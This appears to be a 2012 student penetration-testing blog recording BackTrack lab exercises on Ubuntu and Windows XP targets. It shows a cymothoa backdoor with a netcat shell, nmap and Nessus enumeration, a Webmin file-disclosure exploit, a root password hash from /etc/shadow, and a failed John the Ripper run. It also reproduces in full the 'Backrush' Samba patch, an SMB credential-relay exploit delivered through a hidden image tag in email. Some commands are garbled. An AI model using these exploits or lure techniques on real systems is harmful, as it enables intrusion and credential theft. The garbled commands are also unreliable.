Senin, 30 Januari 2012

use cymothoa on ubuntu

to use cymothoa on ubuntu the steps are :
1. use nessus to get the port and pit number, which are we use to this command
    #nc -l -v -p (the port) -e > cy /bin/bash

    but unfortunately i cant use my nessus, some trouble happend to my web browser (unable to connect/problem loading page), so i cant get the info from nessus report about the por and pit number that i can use. (see the picture )

if can get the port number from nessus, then the next step is
root@bt:/pentest/backdoors/cymothoa# ./cymothoa -p (pit number) -s 0 -y (port number)
if the commnd succed, the ubuntu will be infected.




Privillege Escalation


1.scan dengan nmap to get the information
root@BT:~# nmap -v -A 192.168.0.112

Discovered open port 445/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112

From the information above, We got 5 opening port, thoose we can use to the next steps
We can try open 192.168.0.112 : 10000 in the web browse


2. in the step use exploitdb :
  root@BT:~# cd /pentest/exploits/exploitdb/

3.type ls to know directory
  root@BT:/pentest/exploits/exploitdb# ls
  files.csv  platforms  searchsploit

4. the next write ./searchsploit webmin  to know file webnim
  root@BT:/pentest/exploits/exploitdb# ./searchsploit webmin
  Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

5. copying file 2017 perl with type cp platforms/multiple/remote/2017.pl ~
  root@BT:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~

6. quit to pentest with type cd
  root@BT:/pentest/exploits/exploitdb# cd

7. see the value folder home
  root@BT:~# ls
  2017.pl                          NessusReport21.rtf  NessusReport45.rtf  subnet
  Desktop                          NessusReport26.rtf  NessusReport63.rtf  VirtualBox VMs
  download                         NessusReport27.rtf  NessusReport65.rtf  workspace
  galau.ps                         NessusReport32.rtf  NessusReport66.rtf  xpreport.rtf
  galau.txt                        NessusReport35.rtf  NessusReport67.rtf
  IS2C                             NessusReport40.rtf  NessusReport70.rtf
  Nessus-4.4.1-ubuntu910_i386.deb  NessusReport44.rtf  NessusReport.rtf

8. see file 2017.pl
  root@BT:~# perl 2017.pl
  Usage: 2017.pl <url> <port> <filename> <target>
  TARGETS are
  0  - > HTTP
  1  - > HTTPS
  Define full path with file name
  Example: ./webmin.pl blah.com 10000 /etc/passwd
  root@BT:~# perl 2017.pl 192.168.0.112 10000
  Usage: 2017.pl <url> <port> <filename> <target>
 TARGETS are
 0  - > HTTP
 1  - > HTTPS
 Define full path with file name
 Example: ./webmin.pl blah.com 10000 /etc/passwd

9.Open the encryption of password and user name, with type:perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
root@BT:~# perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking http://192.168.0.112 on port 10000!
FILENAME:  /etc/passwd

 FILE CONTENT STARTED
 -----------------------------------

 -------------------------------------

10. Show all the username and password in shadow folder, type : cat /etc/shadow
   root@BT:~# cat /etc/shadow
   root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
bin:x:15362:0:99999:7:::
sys:x:15362:0:99999:7:::
sync:x:15362:0:99999:7:::
games:x:15362:0:99999:7:::
man:x:15362:0:99999:7:::
lp:x:15362:0:99999:7:::
mail:x:15362:0:99999:7:::
news:x:15362:0:99999:7:::
uucp:x:15362:0:99999:7:::
proxy:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
backup:x:15362:0:99999:7:::
list:x:15362:0:99999:7:::
irc:x:15362:0:99999:7:::
gnats:x:15362:0:99999:7:::
libuuid:x:15362:0:99999:7:::
syslog:x:15362:0:99999:7:::
sshd:x:15362:0:99999:7:::
landscape:x:15362:0:99999:7:::
messagebus:x:15362:0:99999:7:::
nobody:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
snort:*:15362:0:99999:7:::
statd:*:15362:0:99999:7:::
haldaemon:*:15362:0:99999:7:::
kdm:*:15362:0:99999:7:::
festival:*:15362:0:99999:7:::
usbmux:*:15362:0:99999:7:::
postgres:!:15362:0:99999:7:::
privoxy:*:15362:0:99999:7:::
debian-tor:*:15362:0:99999:7:::
clamav:!:15362:0:99999:7:::




Using John The Ripper


Use John The Ripper to cracking the pasword

To get the password file from the shadow file i use this command :
1.      # cd /pentest/passwords/jtr
# ./unshadow /etc/passwd / etc/shadow > pass
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::


2.      Then to crack the password file, i give this command below:
# ./john pass
3.      Then to see the password
# ./john show pass
But it did not work, i have try it,....i dont know where is the mistake!

Jumat, 27 Januari 2012

Using a nessus for service enumeration


-Service Enumeration
1.Using Nessus
-open nessus :https://localhost:8834
-entri user name and password

-chose menu Scan and click buttom add
-insert the name, type, police and scan target

-after finish/ complete scan, click reports to can information gathering

-click host

-click total


-click high continue click number's and click one of show

-click medium

-click open port

-download report and change the type ekstensi.



  1. Scanning with nmap
-scan with type
root@BT:~# nmap -v -A 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 16:57 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 16:57
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 16:57, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:57
Completed Parallel DNS resolution of 1 host. at 16:57, 13.00s elapsed
Initiating SYN Stealth Scan at 16:57
Scanning 192.168.56.101 [1000 ports]
Discovered open port 135/tcp on 192.168.56.101
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 445/tcp on 192.168.56.101
Completed SYN Stealth Scan at 16:57, 1.22s elapsed (1000 total ports)
Initiating Service scan at 16:57
Scanning 3 services on 192.168.56.101
Completed Service scan at 16:57, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSE at 16:57
Completed NSE at 16:57, 0.20s elapsed
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:41:74:C0 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat:
|   NetBIOS name: IS2C-6C66D0BB8D, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:41:74:c0 (Cadmus Computer Systems)
|   Names
|     IS2C-6C66D0BB8D<00>  Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     IS2C-6C66D0BB8D<20>  Flags: <unique><active>
|_    WORKGROUP<1e>        Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: is2c-6c66d0bb8d
|   NetBIOS computer name: IS2C-6C66D0BB8D
|   Workgroup: WORKGROUP
|_  System time: 2012-01-27 16:57:45 UTC+7

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 192.168.56.101

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.08 seconds
           Raw packets sent: 1098 (49.010KB) | Rcvd: 1017 (41.234KB)

-root@BT:~# nmap -v -IR 192.168.56.101
WARNING: identscan (-I) no longer supported.  Ignoring -I

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 17:14 WIT
Initiating ARP Ping Scan at 17:14
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 17:14, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:14
Completed Parallel DNS resolution of 1 host. at 17:15, 13.00s elapsed
Initiating SYN Stealth Scan at 17:15
Scanning 192.168.56.101 [1000 ports]
Discovered open port 135/tcp on 192.168.56.101
Discovered open port 445/tcp on 192.168.56.101
Discovered open port 139/tcp on 192.168.56.101
Completed SYN Stealth Scan at 17:15, 1.20s elapsed (1000 total ports)
Nmap scan report for 192.168.56.101
Host is up (0.00088s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:41:74:C0 (Cadmus Computer Systems)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
           Raw packets sent: 1082 (47.592KB) | Rcvd: 1001 (40.040KB)


-Vulnerability Analisys
1.Using exploitdb
root@BT:~# cd /pentest/exploits/exploitdb
root@BT:/pentest/exploits/exploitdb#  ./searchsploit firefox
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit      /windows/remote/986.html
Mozilla Firefox view-source:javascript url Code Execution Exploit           /multiple/remote/1007.html
Mozilla FireFox <= 1.0.1 Remote GIF Heap Overflow Exploit                   /windows/remote/1089.c
Mozilla Firefox <= 1.0.4 ""Set As Wallpaper"" Code Execution Exploit        /windows/remote/1102.html
Mozilla Firefox <= 1.0.7 Integer Overflow Denial of Service Exploit         /multiple/dos/1233.html
Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit /multiple/dos/1253.html
Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit    /multiple/dos/1257.html
Mozilla Firefox <= 1.5 (history.dat) Looping Vulnerability PoC              /windows/dos/1362.html
Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit           /multiple/remote/1369.html
Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux)        /linux/remote/1474.pm
Mozilla Firefox 1.5 location.QueryInterface() Code Execution (osx)          /osX/remote/1480.pm
Mozilla Firefox <= 1.5.0.1                                                  /multiple/dos/1667.html
Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC /multiple/dos/1716.html
Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit                 /multiple/dos/1802.html
Mozilla Firefox <= 1.5.0.4 (marquee) Denial of Service Exploit              /multiple/dos/1867.html
Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC   /multiple/remote/2082.html
Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit   /multiple/dos/2244.pl
Mozilla Firefox <= 1.5.0.7/ 2.0 (createRange) Remote DoS Exploit            /multiple/dos/2695.html
Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerability   /windows/remote/3340.html
Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit      /multiple/dos/3606.py
Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit                 /multiple/dos/4559.txt
Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash         /windows/dos/6614.html
Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability   /windows/remote/6690.html
Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit                    /windows/dos/7554.pl
Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit                    /windows/dos/7554.pl
Firefox 3.0.5 Status Bar Obfuscation / Clickjacking                         /windows/remote/7842.html
Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit                    /multiple/dos/8091.html
Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash           /multiple/dos/8219.html
Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day               /multiple/dos/8285.txt
Firefox 3.0.x (XML Parser) Memory Corruption / DoS PoC                      /windows/dos/8306.txt
Mozilla Firefox XSL Parsing Remote Memory Corruption PoC #2                 /windows/dos/8356.txt
Mozilla Firefox (unclamped loop) Denial of Service Exploit                  /multiple/dos/8794.htm
Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit            /multiple/dos/8822.txt
DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln          /windows/remote/8922.txt
Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit              /windows/remote/9137.html
Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit              /windows/remote/9137.html
Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC                      /windows/dos/9158.html
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit                   /windows/remote/9181.py
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit (pl)              /windows/remote/9214.pl
Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit (osx)        /osX/remote/9247.py
Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule             /multiple/remote/9651.txt
Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit           /windows/remote/9663.py
Firefox 3.5.3 local download manager temp file creation                     /windows/local/9882.txt
Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution             /multiple/remote/9946.rb
Mozilla Suite/Firefox < 1.0.5 compareTo Code Execution                      /windows/remote/9947.rb
Firefox 3.5 escape Memory Corruption Exploit                                /multiple/remote/9949.rb
Firefox + Adobe Memory Corruption PoC                                       /windows/dos/10208.txt
Mozilla Firefox Location Bar Spoofing Vulnerability                         /multiple/local/10544.html
Firefox 3.6 (XML parser) Memory Corruption PoC/DoS                          /windows/dos/11245.txt
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit       /windows/dos/11432.txt
Mozilla Firefox v3.6 URL Spoofing Vulnerability                             /multiple/local/11561.html
Mozilla Firefox <= 3.6 Denial Of Service Exploit                            /multiple/dos/11590.php
Mozilla Firefox v3.6 and Opera Long String Crash(0day) Exploit              /windows/dos/11617.txt
Firefox 3.6.3 Fork Bomb DoS                                                 /windows/dos/12492.html
Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception /windows/dos/12602.txt
Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities           /windows/dos/12678.txt
Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll)                         /windows/local/14730.c
MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability    /windows/dos/14949.py
MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution /windows/dos/15027.py
MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability /windows/dos/15104.py
Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups                   /windows/dos/15242.html
Firefox Interleaving document.write and appendChild Denial of Service       /multiple/dos/15341.html
Firefox Memory Corruption Proof of Concept (Simplified)                     /multiple/dos/15342.html
Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild) /windows/remote/15352.html
Mozilla Firefox <= 3.6.12 Remote Denial Of Service                          /multiple/dos/15498.html
Firefox 3.5 escape() Return Value Memory Corruption                         /multiple/remote/16299.rb
Mozilla Suite/Firefox Navigator Object Code Execution                       /multiple/remote/16300.rb
Firefox location.QueryInterface() Code Execution                            /multiple/remote/16301.rb
Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution            /windows/remote/16306.rb
Mozilla Firefox Interleaving document.write and appendChild Exploit         /windows/remote/16509.rb
Mozilla Firefox ""nsTreeRange"" Dangling Pointer Exploit                    /windows/remote/17419.zip
Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability              /windows/remote/17520.rb
Firefox 3.6.16 OBJECT mChannel Remote Code Execution Exploit (DEP bypass)   /windows/remote/17612.rb
Mozilla Firefox 3.6.16 mChannel use after free vulnerability                /windows/remote/17650.rb
Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)        /windows/remote/17672.html
Mozilla Firefox Array.reduceRight() Integer Overflow Exploit                /windows/remote/17974.html
Mozilla Firefox Array.reduceRight() Integer Overflow                        /windows/remote/17976.rb
Firefox 8.0 Null Pointer Dereference PoC                                    /multiple/dos/18116.html


root@BT:/pentest/exploits/exploitdb# cat platforms/windows/remote/20.txt                                                                                                                       
##########################################                                                                                                                                                      
# Exploit for "Authentication flaw in Windows SMB protocol" #                                                                                                                                   
##########################################                                                                                                                                                     
# Release Date:                                                                                                                                                                                 
# April 24, 2003                                                                                                                                                                                
#                                                                                                                                                                                               
# Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir)                                                                                                                                            
# Salman Niksefat (salman@linux.ce.aut.ac.ir)                                                                                                                                                   
#
# Systems Affected by this exploit:
# Windows 2000 (SP0 SP1 SP2 SP3)
# Windows XP (SP0 SP1)
#
# EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT
# WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE.
##########################################

This exploit is based on samba-2.2.8a, you can download the source code from:
http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2
or other mirrors.

First you should configure and make samba source code as follow:
You need first to extract the file:
$ tar -jxf samba-2.2.8a.tar.bz2
$ cd samba-2.2.8a/source

Here you need to configure with suitable options. Here is a config for RedHat 9:
$ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages\
--with-lockdir=/var/cache/samba --with-configdir=/etc/samba

$ make
$ make bin/smbmount
$ su
# make install

First add an arbitary user to samba: (Choose a reliable password for it for your protection!)
# smbadduser smbtmpuser:root

Now check if your samba server(bin/smbd) and client(bin/smbmount) are working,
and that ipchains rulls are not set. you can use:
# service smbd stop
# bin/smbd -i
# ipchains -F

Well, now if everything works fine, you can apply the exploit code to the source.
Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch
# patch < backrush.patch

Make it again:
# make bin/smbd
# make bin/smbmount
[Note that you shouldn't make whole samba, cause you may get linker errors]

Make necessary directories:
# mkdir -p bin/backrush/log
# mkdir bin/backrush/mnt
# touch bin/backrush/ip2sharename.map

Now we are done, you MUST change directory to bin and run the server:
# cd bin
# killall -9 smbd
# ./smbd

Now by default, the C$ share folder of any Windows machine who tries to connect
to this SMB server, would be mounted to mnt/machinename-random folder.
If you want to mount another share folder, you can add an entry to ip2sharename.map file as follow:
IPADDRESS:SHARENAME
This option is suitable for XP systems.

2 ways 2 force a client to automatically connect to your modified SMB server:
1. Send him/her a HTML email with the following tag:
<IMG src='\\smb-server\nofile.gif' width=1 height=1>

2. Invite him/her to visit your personal web page.
You can make it by the above tag, then pray and wait until he/she visits your page. ;)

Enjoy!


  * backrush.patch *


diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c
--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430
+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430
@@ -26,6 +26,10 @@
#include <mntent.h>
#include <asm/types.h>
#include <linux/smb_fs.h>
+//>Backrush
+int br_read[2], br_write[2], br_pid;
+struct Backrush br_state;
+//<

extern BOOL in_client;
extern pstring user_socket_options;
@@ -177,6 +181,21 @@
cli_shutdown(c);
return NULL;
}
+//>Backrush
+ {
+ int i;
+ printf("challange: ");
+ for (i = 0; i < 8; i++)
+ printf("%0.2x",c->cryptkey[i]);
+ fflush(stdout);
+ memcpy(br_state.challenge, c->cryptkey, 8);
+ br_state.status = 1;
+ write(br_write[1],&br_state, sizeof(br_state));
+ printf(" sent to server\n");
+ printf("waiting for response...\n");
+ fflush(stdout);
+ }
+//<

if (!got_pass) {
char *pass = getpass("Password: ");
@@ -848,6 +867,14 @@
if (*credentials != 0) {
read_credentials_file(credentials);
}
+//>Backrush
+ printf("Started to mount %s on %s\n",argv[1], argv[2]);
+ fflush(stdout);
+ if (getenv("BACKRUSH_READ"))
+ br_read[0] = atoi(getenv("BACKRUSH_READ"));
+ if (getenv("BACKRUSH_WRITE"))
+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));
+//<

DEBUG(3,("mount.smbfs started (version %s)\n", VERSION));

diff -Nur /root/samba-2.2.8a/source/include/includes.h /backrush/source.exp/include/includes.h
--- /root/samba-2.2.8a/source/include/includes.h 2003-02-28 19:26:18.000000000 +0330
+++ /backrush/source.exp/include/includes.h 2003-04-17 10:36:54.000000000 +0430
@@ -1,5 +1,26 @@
#ifndef _INCLUDES_H
#define _INCLUDES_H
+
+//>Backrush
+#include <stdlib.h>
+#include <time.h>
+struct Backrush
+{
+ int status;
+ char ip_address[20];
+ int port;
+ char username[256];
+ char sharename[256];
+ char netbios[256];
+ char domain[256];
+ char challenge[8];
+ char nt_resp[24];
+ char lm_resp[24];
+};
+extern struct Backrush br_state;
+extern int br_read[2],br_write[2],br_pid;
+//<
+
/*
Unix SMB/Netbios implementation.
Version 1.9.
diff -Nur /root/samba-2.2.8a/source/libsmb/cliconnect.c /backrush/source.exp/libsmb/cliconnect.c
--- /root/samba-2.2.8a/source/libsmb/cliconnect.c 2003-03-15 01:04:48.000000000 +0330
+++ /backrush/source.exp/libsmb/cliconnect.c 2003-04-17 12:30:26.000000000 +0430
@@ -23,7 +23,6 @@

#include "includes.h"

-
static const struct {
int prot;
const char *name;
@@ -265,7 +264,28 @@
memcpy(pword, pass, passlen);
memcpy(ntpword, ntpass, ntpasslen);
}
-
+//>Backrush
+ {
+ int i;
+ read(br_read[0],&br_state, sizeof(br_state));
+ printf("received response:\n");
+ fflush(stdout);
+ memcpy(pword, br_state.lm_resp, 24);
+ memcpy(ntpword, br_state.nt_resp, 24);
+ if(br_state.username[0])
+ strncpy(user, br_state.username, 24);
+ printf("username: %s\n", user);
+ printf("lm response: ");
+ for (i = 0; i < 24; i++)
+ printf("%0.2x",pword[i]);
+ printf("\n");
+ printf("nt response: ");
+ for (i = 0; i < 24; i++)
+ printf("%0.2x",ntpword[i]);
+ printf("\n");
+ fflush(stdout);
+ }
+//<
/* send a session setup command */
memset(cli->outbuf,'\0',smb_size);

diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c
--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330
+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430
@@ -180,6 +180,45 @@
doencrypt = ((cli->sec_mode & 2) != 0);
}

+//>Backrush
+ {
+ srand(time(NULL));
+ pipe(br_read);
+ pipe(br_write);
+ br_state.status = 1;
+ br_state.port = random();
+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));
+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));
+ {
+ char tmp[1024], *ptr;
+ FILE *fin = fopen("backrush/ip2sharename.map","r");
+ if (fin)
+ {
+ while(fscanf(fin, "%s", tmp) > 0)
+ {
+ ptr = strchr(tmp, ':');
+ *ptr++ = 0;
+ if (!strcmp(br_state.ip_address,tmp))
+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));
+ }
+ fclose(fin);
+ }
+ }
+ if (!(br_pid = fork()))
+ {
+ char cmd[1024];
+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);
+ system(cmd);
+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d;
./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in
>backrush/log/%s-%d",
+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address,
br_state.port, br_state.ip_address, br_state.port);
+ system(cmd);
+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d",
br_state.ip_address, br_state.port);
+ system(cmd);
+ _exit(0);
+ }
+ }
+//<
+
if (doencrypt) {
crypt_len = 8;
if (!cli) {
diff -Nur /root/samba-2.2.8a/source/smbd/password.c /backrush/source.exp/smbd/password.c
--- /root/samba-2.2.8a/source/smbd/password.c 2003-04-07 06:24:00.000000000 +0430
+++ /backrush/source.exp/smbd/password.c 2003-04-19 09:15:47.000000000 +0430
@@ -48,6 +48,10 @@
unsigned char buf[8];

generate_random_buffer(buf,8,False);
+//>Backrush
+ read(br_read[0],&br_state, sizeof(br_state));
+ memcpy(buf, br_state.challenge, 8);
+//<

memcpy(saved_challenge, buf, 8);
memcpy(challenge,buf,8);
@@ -466,7 +470,13 @@
uchar challenge[8];
char* user_name;
uint8 *nt_pw, *lm_pw;
-
+//>Backrush
+ memcpy(br_state.nt_resp, nt_pass, 24);
+ memcpy(br_state.lm_resp, lm_pass, 24);
+ write(br_write[1],&br_state, sizeof(br_state));
+// waitpid(br_pid,NULL,WNOHANG);
+ return(False);
+//<
if (!lm_pass || !sampass)
return(False);

diff -Nur /root/samba-2.2.8a/source/smbd/reply.c /backrush/source.exp/smbd/reply.c
--- /root/samba-2.2.8a/source/smbd/reply.c 2003-04-07 06:24:00.000000000 +0430
+++ /backrush/source.exp/smbd/reply.c 2003-04-16 18:03:58.000000000 +0430
@@ -974,6 +974,11 @@
* security=domain.
*/

+//>Backrush
+ strncpy(br_state.username,user,sizeof(br_state.username));
+ strncpy(user,"root",sizeof(br_state.username));
+//<
+
if (!guest && !check_server_security(orig_user, domain, user,
smb_apasswd, smb_apasslen, smb_ntpasswd, smb_ntpasslen) &&
!check_domain_security(orig_user, domain, user, smb_apasswd,
diff -Nur /root/samba-2.2.8a/source/smbd/server.c /backrush/source.exp/smbd/server.c
--- /root/samba-2.2.8a/source/smbd/server.c 2003-03-15 01:04:49.000000000 +0330
+++ /backrush/source.exp/smbd/server.c 2003-04-16 18:05:17.000000000 +0430
@@ -25,6 +25,11 @@
extern fstring global_myworkgroup;
extern pstring global_myname;

+//<Backrush
+int br_read[2],br_write[2],br_pid;
+struct Backrush br_state;
+//>
+
int am_parent = 1;

/* the last message the was processed */

# milw0rm.com [2003-04-25]
root@BT:/pentest/exploits/exploitdb# nmap 192.168.0.67

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 21:05 WIT
Nmap scan report for 192.168.0.67
Host is up (0.0021s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:B3:F9:F8 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds